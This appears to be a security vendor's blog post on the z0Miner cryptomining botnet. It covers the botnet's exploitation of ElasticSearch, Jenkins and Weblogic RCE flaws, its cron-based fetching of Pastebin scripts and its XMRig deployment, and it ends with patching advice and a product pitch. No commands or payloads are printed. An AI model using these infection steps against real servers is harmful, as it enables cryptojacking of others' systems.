z0Miner Spreads Using ElasticSearch and Jenkins RCE Vulnerabilities
The cryptomining botnet is seeking to take control of Jenkins and ElasticSearch servers and mine for Monero cryptocurrency.
In recent months, stimulated by the overflow of Bitcoin and Monero, various crypto mining families have become active. Based on statistics published by 360 Netlab researchers, most of them are old ones that have appeared for some time, and others are just new mining Trojan horse groups, like z0Miner.
On November 2nd, 2020, Tencent Host Security captured the attack of z0Miner exploiting Weblogic’s unauthorized command execution vulnerabilities (CVE-2020-14882 and CVE-2020-14883). The group scanned cloud servers in batches to find vulnerabilities and sent carefully constructed data to compromise and execute arbitrary code on the target server.
However, researchers at 360 Netlab observed that the hackers have recently upgraded the malware to scan for and attempt to infect new devices by exploiting a remote command execution vulnerability impacting ElasticSearch (CVE-2015-1427) and an older RCE impacting Jenkins servers. The cryptomining botnet is attempting to take control of their servers to mine for Monero (XMR) cryptocurrency.
After it compromises the server, the malware downloads a malicious shell script, and starts tracking down and killing previously deployed cryptominers. Afterward, it sets up a new cron entry to periodically grab and execute malicious scripts from Pastebin.
As in the early days, z0Miner will still periodically download and execute malicious scripts on Pastebin by setting the cron task. The latest malicious script URL is as follows:
The next stage of the infection flow involves downloading a mining kit containing an XMRig miner script, a config file, a starter script, and starting to mine cryptocurrency in the background.
After Killing a batch of competitors and setting up the cron task, conf.txt will download the mining kit from the following 3 URLs and start the mining machine:
Cryptomining botnets regularly use several wallets to collect illegally earned cryptocurrency. As you can observe from the stats shared by 360 Netlab, the z0Miner botnet resumed its activity during mid-January after a short break earlier that month.
Following this incident, the 360 Netlab team recommends ElasticEearch and Jenkins users to check their systems and update them in time, check for abnormal processes and network connections, and monitor and block irrelevant IP and URLs.
In this context, I would advise you to conduct every transaction from a secured endpoint. Our Heimdal™ Threat Prevention product can safeguard your computer and cryptocurrency account against all types of online attacks such as malware, ransomware, cryptojacking, and even cryotominers.